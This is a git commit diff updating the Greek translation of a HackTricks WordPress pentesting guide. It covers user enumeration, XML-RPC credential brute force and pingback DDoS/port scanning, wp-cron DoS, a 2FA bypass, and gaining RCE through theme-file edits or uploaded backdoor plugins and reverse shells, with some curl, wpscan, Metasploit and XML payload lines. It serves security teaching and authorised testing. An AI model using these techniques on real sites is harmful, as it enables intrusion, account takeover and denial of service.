mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 09:27:32 +00:00
Translated ['network-services-pentesting/pentesting-web/wordpress.md'] t
This commit is contained in:
parent
27c0e52d96
commit
cbc4777591
1 changed files with 63 additions and 61 deletions
|
@ -2,19 +2,19 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team του HackTricks AWS)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team του HackTricks AWS)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Ανακαλύψτε την [**Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Χρησιμοποιήστε το [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) για να δημιουργήσετε εύκολα και να **αυτοματοποιήσετε ροές εργασίας** με τα πιο προηγμένα εργαλεία κοινότητας στον κόσμο.\
|
||||
|
@ -26,7 +26,7 @@
|
|||
|
||||
Τα αρχεία που **ανεβάζονται** πηγαίνουν στο: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`\
|
||||
Τα αρχεία θεμάτων μπορούν να βρεθούν στο /wp-content/themes/, οπότε αν αλλάξετε κάποιο php του θέματος για να πάρετε RCE πιθανόν θα χρησιμοποιήσετε αυτήν τη διαδρομή. Για παράδειγμα: Χρησιμοποιώντας το **θέμα twentytwelve** μπορείτε να **έχετε πρόσβαση** στο αρχείο **404.php** στο: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\
|
||||
Μια άλλη χρήσιμη διεύθυνση URL θα μπορούσε να είναι: [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
|
||||
**Μια άλλη χρήσιμη διεύθυνση μπορεί να είναι:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
|
||||
|
||||
Στο **wp-config.php** μπορείτε να βρείτε τον κωδικό ρίζας της βάσης δεδομένων.
|
||||
|
||||
|
@ -37,20 +37,20 @@
|
|||
* `index.php`
|
||||
* Το αρχείο `license.txt` περιέχει χρήσιμες πληροφορίες όπως η έκδοση του WordPress που είναι εγκατεστημένη.
|
||||
* Το `wp-activate.php` χρησιμοποιείται για τη διαδικασία ενεργοποίησης μέσω email κατά την εγκατάσταση ενός νέου ιστότοπου WordPress.
|
||||
* Φάκελοι σύνδεσης (ενδέχεται να έχουν μετονομαστεί για να κρυφτούν):
|
||||
* Φάκελοι σύνδεσης (μπορεί να έχουν μετονομαστεί για να κρυφτούν):
|
||||
* `/wp-admin/login.php`
|
||||
* `/wp-admin/wp-login.php`
|
||||
* `/login.php`
|
||||
* `/wp-login.php`
|
||||
* Το `xmlrpc.php` είναι ένα αρχείο που αντιπροσωπεύει μια λειτουργία του WordPress που επιτρέπει τη μετάδοση δεδομένων με HTTP ως μηχανισμό μεταφοράς και XML ως μηχανισμό κωδικοποίησης. Αυτός ο τύπος επικοινωνίας έχει αντικατασταθεί από το [REST API](https://developer.wordpress.org/rest-api/reference) του WordPress.
|
||||
* Το `xmlrpc.php` είναι ένα αρχείο που αντιπροσωπεύει μια λειτουργία του WordPress που επιτρέπει τη μετάδοση δεδομένων με HTTP να ενεργεί ως μηχανισμός μεταφοράς και το XML ως μηχανισμός κωδικοποίησης. Αυτός ο τύπος επικοινωνίας έχει αντικατασταθεί από το [REST API](https://developer.wordpress.org/rest-api/reference) του WordPress.
|
||||
* Ο φάκελος `wp-content` είναι ο κύριος κατάλογος όπου αποθηκεύονται τα πρόσθετα και τα θέματα.
|
||||
* Το `wp-content/uploads/` είναι ο κατάλογος όπου αποθηκεύονται τα αρχεία που ανεβάζονται στην πλατφόρμα.
|
||||
* Το `wp-includes/` είναι ο κατάλογος όπου αποθηκεύονται τα βασικά αρχεία, όπως πιστοποιητικά, γραμματοσειρές, αρχεία JavaScript και widgets.
|
||||
* Το `wp-sitemap.xml` Στις εκδόσεις του Wordpress 5.5 και νεότερες, το Wordpress δημιουργεί ένα αρχείο XML χάρτη ιστοσελίδας με όλες τις δημόσιες αναρτήσεις και τις δημόσια ερωτήσιμες τύπους αναρτήσεων και ταξινομίες.
|
||||
* Το `wp-includes/` είναι ο κατάλογος όπου αποθηκεύονται τα κύρια αρχεία, όπως πιστοποιητικά, γραμματοσειρές, αρχεία JavaScript και widgets.
|
||||
* Το `wp-sitemap.xml` Στις εκδόσεις του Wordpress 5.5 και μεταγενέστερες, το Wordpress δημιουργεί ένα αρχείο XML χάρτη ιστότοπου με όλες τις δημόσιες αναρτήσεις και τύπους αναρτήσεων και ταξινομίες που είναι δημόσια ερωτήσιμες.
|
||||
|
||||
**Μετά την εκμετάλλευση**
|
||||
|
||||
* Το αρχείο `wp-config.php` περιέχει πληροφορίες που απαιτούνται από το WordPress για τη σύνδεση στη βάση δεδομένων, όπως το όνομα της βάσης δεδομένων, τον κεντρικό υπολογιστή της βάσης δεδομένων, το όνομα χρήστη και ο κωδικός πρόσβασης, τα κλειδιά και τα αλάτια πιστοποίησης και το πρόθεμα του πίνακα βάσης δεδομένων. Αυτό το αρχείο ρύθμισης μπορεί επίσης να χρησιμοποιηθεί για την ενεργοποίηση της λειτουργίας DEBUG, η οποία μπορεί να είναι χρήσιμη για την επίλυση προβλημάτων.
|
||||
* Το αρχείο `wp-config.php` περιέχει πληροφορίες που απαιτούνται από το WordPress για τη σύνδεση στη βάση δεδομένων, όπως το όνομα της βάσης δεδομένων, τον κεντρικό υπολογιστή της βάσης δεδομένων, το όνομα χρήστη και τον κωδικό πρόσβασης, τα κλειδιά και τα αλάτια πιστοποίησης και το πρόθεμα του πίνακα βάσης δεδομένων. Αυτό το αρχείο ρύθμισης μπορεί επίσης να χρησιμοποιηθεί για να ενεργοποιήσετε τη λειτουργία DEBUG, η οποία μπορεί να είναι χρήσιμη για την επίλυση προβλημάτων.
|
||||
|
||||
### Δικαιώματα Χρηστών
|
||||
|
||||
|
@ -58,7 +58,7 @@
|
|||
* **Συντάκτης**: Δημοσιεύει και διαχειρίζεται τις δικές του και τις δημοσιεύσεις άλλων
|
||||
* **Συγγραφέας**: Δημοσιεύει και διαχειρίζεται τις δικές του δημοσιεύσεις
|
||||
* **Συνεισφέρων**: Γράφει και διαχειρίζεται τις δημοσιεύσεις του αλλά δεν μπορεί να τις δημοσιεύσει
|
||||
* **Συνδρομητής**: Περιηγείται στις αναρτήσεις και επεξεργάζεται το προφίλ του
|
||||
* **Συνδρομητής**: Περιηγείται στις δημοσιεύσεις και επεξεργάζεται το προφίλ του
|
||||
|
||||
## **Παθητική Απαρίθμηση**
|
||||
|
||||
|
@ -74,15 +74,15 @@ curl https://victim.com/ | grep 'content="WordPress'
|
|||
```
|
||||
* `meta name`
|
||||
|
||||
![](<../../.gitbook/assets/image (343).png>)
|
||||
![](<../../.gitbook/assets/image (1108).png>)
|
||||
|
||||
* Αρχεία σύνδεσης CSS
|
||||
|
||||
![](<../../.gitbook/assets/image (344).png>)
|
||||
![](<../../.gitbook/assets/image (530).png>)
|
||||
|
||||
* Αρχεία JavaScript
|
||||
|
||||
![](<../../.gitbook/assets/image (346).png>)
|
||||
![](<../../.gitbook/assets/image (521).png>)
|
||||
|
||||
### Λήψη Προσθέτων
|
||||
|
||||
|
@ -90,6 +90,8 @@ curl https://victim.com/ | grep 'content="WordPress'
|
|||
```bash
|
||||
curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
### Λήψη Θεμάτων
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
|
@ -98,14 +100,14 @@ curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-conten
|
|||
```
|
||||
### Εξαγωγή εκδόσεων γενικά
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
{% endcode %}
|
||||
```bash
|
||||
curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
|
||||
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Χρησιμοποιήστε το [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) για να δημιουργήσετε εύκολα και να **αυτοματοποιήσετε ροές εργασίας** με τα πιο προηγμένα εργαλεία της παγκόσμιας κοινότητας.\
|
||||
|
@ -117,21 +119,21 @@ curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/supp
|
|||
|
||||
### Πρόσθετα και Θέματα
|
||||
|
||||
Ίσως δεν μπορέσετε να βρείτε όλα τα πρόσθετα και θέματα που είναι δυνατόν. Για να ανακαλύψετε όλα αυτά, θα χρειαστεί να **επιχειρήσετε ενεργά να δοκιμάσετε μια λίστα με πρόσθετα και θέματα** (ελπίζουμε ότι υπάρχουν αυτοματοποιημένα εργαλεία που περιέχουν αυτές τις λίστες).
|
||||
Πιθανώς δεν θα μπορέσετε να βρείτε όλα τα πρόσθετα και θέματα που είναι δυνατόν. Για να ανακαλύψετε όλα αυτά, θα πρέπει να **επιχειρήσετε ενεργά να κάνετε Brute Force μια λίστα με πρόσθετα και θέματα** (ελπίζουμε ότι υπάρχουν αυτοματοποιημένα εργαλεία που περιέχουν αυτές τις λίστες).
|
||||
|
||||
### Χρήστες
|
||||
|
||||
**Επίθεση Brute Force με βάση το ID**
|
||||
**ID Brute**
|
||||
|
||||
Μπορείτε να ανακαλύψετε έγκυρους χρήστες από έναν ιστότοπο WordPress με την επίθεση Brute Force στα αναγνωριστικά των χρηστών:
|
||||
Μπορείτε να λάβετε έγκυρους χρήστες από έναν ιστότοπο WordPress με Brute Force στα αναγνωριστικά χρηστών:
|
||||
```
|
||||
curl -s -I -X GET http://blog.example.com/?author=1
|
||||
```
|
||||
**Αν οι απαντήσεις είναι** **200** **ή** **30X**, **αυτό σημαίνει ότι το id είναι** **έγκυρο**. **Αν η απάντηση είναι** **400**, **τότε το id είναι** **μη έγκυρο**.
|
||||
Εάν οι απαντήσεις είναι **200** ή **30X**, αυτό σημαίνει ότι το id είναι **έγκυρο**. Εάν η απάντηση είναι **400**, τότε το id είναι **μη έγκυρο**.
|
||||
|
||||
**wp-json**
|
||||
|
||||
Μπορείτε επίσης να προσπαθήσετε να λάβετε πληροφορίες σχετικά με τους χρήστες με ερώτημα:
|
||||
Μπορείτε επίσης να δοκιμάσετε να λάβετε πληροφορίες σχετικά με τους χρήστες με ερώτημα:
|
||||
```
|
||||
curl http://blog.example.com/wp-json/wp/v2/users
|
||||
```
|
||||
|
@ -139,17 +141,17 @@ curl http://blog.example.com/wp-json/wp/v2/users
|
|||
```
|
||||
curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
|
||||
```
|
||||
Σημειώστε ότι αυτό το σημείο πρόσβασης αποκαλύπτει μόνο τους χρήστες που έχουν κάνει μια δημοσίευση. **Θα παρέχονται πληροφορίες μόνο για τους χρήστες που έχουν ενεργοποιήσει αυτό το χαρακτηριστικό**.
|
||||
Σημειώστε ότι αυτό το σημείο πρόσβασης αποκαλύπτει μόνο τους χρήστες που έχουν δημοσιεύσει ένα άρθρο. **Θα παρέχονται πληροφορίες μόνο για τους χρήστες που έχουν ενεργοποιήσει αυτήν τη λειτουργία**.
|
||||
|
||||
Επίσης, σημειώστε ότι **/wp-json/wp/v2/pages** μπορεί να διαρρεύσει διευθύνσεις IP.
|
||||
Επίσης, σημειώστε ότι το **/wp-json/wp/v2/pages** θα μπορούσε να διαρρεύσει διευθύνσεις IP.
|
||||
|
||||
#### Απαρίθμηση ονομάτων σύνδεσης
|
||||
|
||||
Κατά τη σύνδεση στο **`/wp-login.php`** το **μήνυμα** είναι **διαφορετικό** αν το καθορισμένο **όνομα χρήστη υπάρχει ή όχι**.
|
||||
Κατά τη σύνδεση στο **`/wp-login.php`** το **μήνυμα** είναι **διαφορετικό** αν το συγκεκριμένο **όνομα χρήστη υπάρχει ή όχι**.
|
||||
|
||||
### XML-RPC
|
||||
|
||||
Αν το `xml-rpc.php` είναι ενεργό, μπορείτε να εκτελέσετε μια επίθεση εξαναγκασμού διαπιστευτήριων ή να το χρησιμοποιήσετε για να εκτελέσετε επιθέσεις DoS σε άλλους πόρους. (Μπορείτε να αυτοματοποιήσετε αυτήν τη διαδικασία [χρησιμοποιώντας αυτό](https://github.com/relarizky/wpxploit) για παράδειγμα).
|
||||
Αν το `xml-rpc.php` είναι ενεργό, μπορείτε να εκτελέσετε μια επίθεση brute-force στα διαπιστευτήρια ή να το χρησιμοποιήσετε για να εκτελέσετε επιθέσεις DoS σε άλλους πόρους. (Μπορείτε να αυτοματοποιήσετε αυτήν τη διαδικασία [χρησιμοποιώντας αυτό](https://github.com/relarizky/wpxploit) για παράδειγμα).
|
||||
|
||||
Για να δείτε αν είναι ενεργό, δοκιμάστε να έχετε πρόσβαση στο _**/xmlrpc.php**_ και να στείλετε αυτό το αίτημα:
|
||||
|
||||
|
@ -174,13 +176,13 @@ curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
|
|||
</params>
|
||||
</methodCall>
|
||||
```
|
||||
Το μήνυμα _"Λάθος όνομα χρήστη ή κωδικός πρόσβασης"_ μέσα σε μια απάντηση κώδικα 200 θα πρέπει να εμφανίζεται εάν τα διαπιστευτήρια δεν είναι έγκυρα.
|
||||
Το μήνυμα _"Λάθος όνομα χρήστη ή κωδικός πρόσβασης"_ σε μια απάντηση κώδικα 200 θα πρέπει να εμφανίζεται εάν τα διαπιστευτήρια δεν είναι έγκυρα.
|
||||
|
||||
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (4).png>)
|
||||
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (4) (1).png>)
|
||||
|
||||
![](<../../.gitbook/assets/image (102).png>)
|
||||
![](<../../.gitbook/assets/image (718).png>)
|
||||
|
||||
Χρησιμοποιώντας τα σωστά διαπιστευτήρια μπορείτε να ανεβάσετε ένα αρχείο. Στην απάντηση θα εμφανιστεί η διαδρομή ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982))
|
||||
Χρησιμοποιώντας τα σωστά διαπιστευτήρια μπορείτε να μεταφορτώσετε ένα αρχείο. Στην απάντηση θα εμφανιστεί η διαδρομή ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982))
|
||||
```markup
|
||||
<?xml version='1.0' encoding='utf-8'?>
|
||||
<methodCall>
|
||||
|
@ -210,18 +212,18 @@ curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
|
|||
</params>
|
||||
</methodCall>
|
||||
```
|
||||
Υπάρχει επίσης ένας **ταχύτερος τρόπος** για τη δοκιμή δύναμης διαπιστευτήριων χρησιμοποιώντας το **`system.multicall`** καθώς μπορείτε να δοκιμάσετε αρκετά διαπιστευτήρια με το ίδιο αίτημα:
|
||||
Υπάρχει επίσης ένας **ταχύτερος τρόπος** για την ανάγκαση διαπιστευτήριων χρησιμοποιώντας το **`system.multicall`** καθώς μπορείτε να δοκιμάσετε πολλά διαπιστευτήρια με τον ίδιο αίτημα:
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (188).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (625).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**Παράκαμψη 2FA**
|
||||
|
||||
Αυτή η μέθοδος είναι για προγράμματα και όχι για ανθρώπους, και παλιά, επομένως δεν υποστηρίζει 2FA. Έτσι, αν έχετε έγκυρα διαπιστευτήρια αλλά η κύρια είσοδος προστατεύεται από 2FA, **μπορείτε να καταχραστείτε το xmlrpc.php για να συνδεθείτε με αυτά τα διαπιστευτήρια παρακάμπτοντας το 2FA**. Σημειώστε ότι δεν θα μπορείτε να εκτελέσετε όλες τις ενέργειες που μπορείτε να κάνετε μέσω της κονσόλας, αλλά ενδέχεται να μπορείτε ακόμα να φτάσετε σε RCE όπως το εξηγεί ο Ippsec στο [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s)
|
||||
Αυτή η μέθοδος είναι για προγράμματα και όχι για ανθρώπους, και παλιά, επομένως δεν υποστηρίζει 2FA. Έτσι, αν έχετε έγκυρα διαπιστευτήρια αλλά η κύρια είσοδος προστατεύεται από 2FA, **μπορείτε να εκμεταλλευτείτε το xmlrpc.php για να συνδεθείτε με αυτά τα διαπιστευτήρια παρακάμπτοντας το 2FA**. Σημειώστε ότι δεν θα μπορείτε να εκτελέσετε όλες τις ενέργειες που μπορείτε να κάνετε μέσω της κονσόλας, αλλά ενδέχεται να μπορείτε ακόμα να φτάσετε σε RCE όπως το εξηγεί ο Ippsec στο [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s)
|
||||
|
||||
**DDoS ή σάρωση θυρών**
|
||||
|
||||
Αν μπορείτε να βρείτε τη μέθοδο _**pingback.ping**_ μέσα στη λίστα μπορείτε να κάνετε το Wordpress να στείλει ένα αυθαίρετο αίτημα σε οποιονδήποτε κόμβο/θύρα.\
|
||||
Αυτό μπορεί να χρησιμοποιηθεί για να ζητήσετε από **χιλιάδες** ιστότοπους **Wordpress** να **έχουν πρόσβαση** σε μια **τοποθεσία** (έτσι προκαλείται ένα **DDoS** σε αυτή την τοποθεσία) ή μπορείτε να το χρησιμοποιήσετε για να κάνετε το **Wordpress** να **σαρώσει** κάποιο εσωτερικό **δίκτυο** (μπορείτε να υποδείξετε οποιαδήποτε θύρα).
|
||||
Αν μπορείτε να βρείτε τη μέθοδο _**pingback.ping**_ μέσα στη λίστα μπορείτε να κάνετε το Wordpress να στείλει ένα αυθαίρετο αίτημα σε οποιοδήποτε κόμβο/θύρα.\
|
||||
Αυτό μπορεί να χρησιμοποιηθεί για να ζητήσετε από **χιλιάδες** ιστοσελίδες **Wordpress** να **έχουν πρόσβαση** σε μια **τοποθεσία** (έτσι προκαλείται ένα **DDoS** σε αυτήν την τοποθεσία) ή μπορείτε να το χρησιμοποιήσετε για να κάνετε το **Wordpress** να **σαρώσει** κάποιο εσωτερικό **δίκτυο** (μπορείτε να υποδείξετε οποιαδήποτε θύρα).
|
||||
```markup
|
||||
<methodCall>
|
||||
<methodName>pingback.ping</methodName>
|
||||
|
@ -233,9 +235,9 @@ curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
|
|||
```
|
||||
![](../../.gitbook/assets/1_JaUYIZF8ZjDGGB7ocsZC-g.png)
|
||||
|
||||
Εάν λάβετε το **faultCode** με τιμή **μεγαλύτερη** από **0** (17), σημαίνει ότι η θύρα είναι ανοιχτή.
|
||||
Αν λάβετε το **faultCode** με μια τιμή **μεγαλύτερη** από **0** (17), σημαίνει ότι η θύρα είναι ανοιχτή.
|
||||
|
||||
Ρίξτε μια ματιά στη χρήση της **`system.multicall`** στην προηγούμενη ενότητα για να μάθετε πώς να καταχραστείτε αυτήν τη μέθοδο για να προκαλέσετε DDoS.
|
||||
Ρίξτε μια ματιά στη χρήση της **`system.multicall`** στο προηγούμενο τμήμα για να μάθετε πώς να καταχραστείτε αυτήν τη μέθοδο για να προκαλέσετε DDoS.
|
||||
|
||||
**DDoS**
|
||||
```markup
|
||||
|
@ -247,9 +249,9 @@ curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
|
|||
</params>
|
||||
</methodCall>
|
||||
```
|
||||
![](<../../.gitbook/assets/image (103).png>)
|
||||
![](<../../.gitbook/assets/image (107).png>)
|
||||
|
||||
### wp-cron.php DoS
|
||||
### Απορροφητικότητα wp-cron.php
|
||||
|
||||
Αυτό το αρχείο υπάρχει συνήθως υπό τη ρίζα του ιστότοπου του Wordpress: **`/wp-cron.php`**\
|
||||
Όταν αυτό το αρχείο **προσπελαύνεται**, εκτελείται ένα "**βαρύ**" ερώτημα MySQL, οπότε θα μπορούσε να χρησιμοποιηθεί από **επιτιθέμενους** για να **προκαλέσουν** ένα **DoS**.\
|
||||
|
@ -263,7 +265,7 @@ curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
|
|||
|
||||
Αυτή είναι η απάντηση όταν δεν λειτουργεί:
|
||||
|
||||
![](<../../.gitbook/assets/image (184) (1).png>)
|
||||
![](<../../.gitbook/assets/image (362).png>)
|
||||
|
||||
### SSRF
|
||||
|
||||
|
@ -277,7 +279,7 @@ cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x6
|
|||
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
|
||||
#You can try to bruteforce the admin user using wpscan with "-U admin"
|
||||
```
|
||||
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Χρησιμοποιήστε το [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) για να δημιουργήσετε εύκολα και να **αυτοματοποιήσετε ροές εργασίας** με τα πιο προηγμένα εργαλεία της παγκόσμιας κοινότητας.\
|
||||
|
@ -287,7 +289,7 @@ wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detec
|
|||
|
||||
## Αποκτήστε πρόσβαση με τον παρακάτω τρόπο
|
||||
|
||||
Περισσότερο από μια πραγματική επίθεση, αυτό είναι ένα είδος περιέργειας. Στο CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) μπορείτε να αντιστρέψετε 1 bit από οποιοδήποτε αρχείο wordpress. Έτσι, μπορείτε να αντιστρέψετε τη θέση `5389` του αρχείου `/var/www/html/wp-includes/user.php` για να ακυρώσετε τη λειτουργία NOT (`!`).
|
||||
Περισσότερο παρά πραγματική επίθεση, αυτό είναι ένα είδος περιέργειας. Στο CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) μπορείτε να αντιστρέψετε 1 bit από οποιοδήποτε αρχείο wordpress. Έτσι, μπορείτε να αντιστρέψετε τη θέση `5389` του αρχείου `/var/www/html/wp-includes/user.php` για να μετατρέψετε τη λειτουργία NOT (`!`) σε NOP.
|
||||
```php
|
||||
if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
|
||||
return new WP_Error(
|
||||
|
@ -300,7 +302,7 @@ return new WP_Error(
|
|||
|
||||
Αλλάξτε το περιεχόμενο για ένα php shell:
|
||||
|
||||
![](<../../.gitbook/assets/image (21) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (381).png>)
|
||||
|
||||
Αναζητήστε στο διαδίκτυο πώς μπορείτε να έχετε πρόσβαση σε αυτήν την ενημερωμένη σελίδα. Σε αυτήν την περίπτωση πρέπει να έχετε πρόσβαση εδώ: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
|
||||
|
||||
|
@ -312,47 +314,47 @@ use exploit/unix/webapp/wp_admin_shell_upload
|
|||
```
|
||||
## Εκμετάλλευση Προσθέτου RCE
|
||||
|
||||
### Προσθέτο PHP
|
||||
### Προσθέτου PHP
|
||||
|
||||
Είναι δυνατόν να μεταφορτώσετε αρχεία .php ως πρόσθετο. Δημιουργήστε το backdoor php σας χρησιμοποιώντας για παράδειγμα:
|
||||
Μπορεί να είναι δυνατή η μεταφόρτωση αρχείων .php ως πρόσθετο. Δημιουργήστε την πίσω πόρτα php χρησιμοποιώντας για παράδειγμα:
|
||||
|
||||
![](<../../.gitbook/assets/image (407).png>)
|
||||
![](<../../.gitbook/assets/image (180).png>)
|
||||
|
||||
Στη συνέχεια προσθέστε ένα νέο πρόσθετο:
|
||||
|
||||
![](<../../.gitbook/assets/image (409).png>)
|
||||
![](<../../.gitbook/assets/image (719).png>)
|
||||
|
||||
Μεταφορτώστε το πρόσθετο και πατήστε Εγκατάσταση Τώρα:
|
||||
|
||||
![](<../../.gitbook/assets/image (411).png>)
|
||||
![](<../../.gitbook/assets/image (246).png>)
|
||||
|
||||
Κάντε κλικ στο Προχωρήστε:
|
||||
|
||||
![](<../../.gitbook/assets/image (412).png>)
|
||||
![](<../../.gitbook/assets/image (67).png>)
|
||||
|
||||
Πιθανώς αυτό δεν θα κάνει τίποτα εμφανώς, αλλά αν πάτε στα Μέσα, θα δείτε το shell που μεταφορτώθηκε:
|
||||
Πιθανώς αυτό δεν θα κάνει τίποτα εμφανώς, αλλά αν πάτε στα Μέσα, θα δείτε την κέλυφό σας να έχει μεταφορτωθεί:
|
||||
|
||||
![](<../../.gitbook/assets/image (413).png>)
|
||||
![](<../../.gitbook/assets/image (459).png>)
|
||||
|
||||
Αποκτήστε πρόσβαση και θα δείτε το URL για να εκτελέσετε το αντίστροφο shell:
|
||||
Αποκτήστε πρόσβαση και θα δείτε το URL για να εκτελέσετε την αντίστροφη κέλυφο:
|
||||
|
||||
![](<../../.gitbook/assets/image (414).png>)
|
||||
![](<../../.gitbook/assets/image (1003).png>)
|
||||
|
||||
### Μεταφόρτωση και ενεργοποίηση κακόβουλου πρόσθετου
|
||||
|
||||
Αυτή η μέθοδος περιλαμβάνει την εγκατάσταση ενός κακόβουλου πρόσθετου που είναι ευάλωτο και μπορεί να εκμεταλλευτεί για την απόκτηση ενός web shell. Αυτή η διαδικασία πραγματοποιείται μέσω του πίνακα ελέγχου του WordPress ως εξής:
|
||||
Αυτή η μέθοδος περιλαμβάνει την εγκατάσταση ενός κακόβουλου πρόσθετου που είναι ευάλωτο και μπορεί να εκμεταλλευτεί για την απόκτηση μιας ιστοσελίδας. Αυτή η διαδικασία πραγματοποιείται μέσω του πίνακα ελέγχου του WordPress ως εξής:
|
||||
|
||||
1. **Απόκτηση Προσθέτου**: Το πρόσθετο αποκτάται από μια πηγή όπως το Exploit DB όπως [**εδώ**](https://www.exploit-db.com/exploits/36374).
|
||||
1. **Απόκτηση Προσθέτου**: Το πρόσθετο αποκτάται από πηγή όπως το Exploit DB όπως [**εδώ**](https://www.exploit-db.com/exploits/36374).
|
||||
2. **Εγκατάσταση Προσθέτου**:
|
||||
* Πλοηγηθείτε στον πίνακα ελέγχου του WordPress, στη συνέχεια μεταβείτε σε `Πίνακας Ελέγχου > Πρόσθετα > Μεταφόρτωση Προσθέτου`.
|
||||
